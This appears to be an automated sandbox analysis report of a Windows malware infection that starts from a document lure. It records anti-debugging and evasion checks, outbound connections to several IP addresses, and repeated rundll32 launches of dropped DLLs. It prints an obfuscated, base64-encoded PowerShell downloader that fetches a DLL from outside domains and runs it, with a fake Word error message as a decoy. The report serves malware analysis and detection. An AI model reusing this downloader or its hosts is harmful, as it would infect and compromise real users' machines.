Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_7-13512
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_7-13860

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2356

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E75F0 FindFirstFileW,

17_2_002E75F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000007.00000002.2094842307.000000000032D000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_7-13862
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_7-13598

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind

7_2_10002460

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_10007528

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10013BFB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A76B2 mov eax, dword ptr fs:[00000030h]	7_2_002A76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B6AB2 mov eax, dword ptr fs:[00000030h]	8_2_001B6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002176B2 mov eax, dword ptr fs:[00000030h]	10_2_002176B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A6AB2 mov eax, dword ptr fs:[00000030h]	11_2_006A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007276B2 mov eax, dword ptr fs:[00000030h]	12_2_007276B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6AB2 mov eax, dword ptr fs:[00000030h]	13_2_001E6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_002276B2 mov eax, dword ptr fs:[00000030h]	14_2_002276B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00686AB2 mov eax, dword ptr fs:[00000030h]	15_2_00686AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_002E76B2 mov eax, dword ptr fs:[00000030h]	17_2_002E76B2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10004500

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10007528
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_10009F26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10006F64

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 167.71.148.58 187

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApAC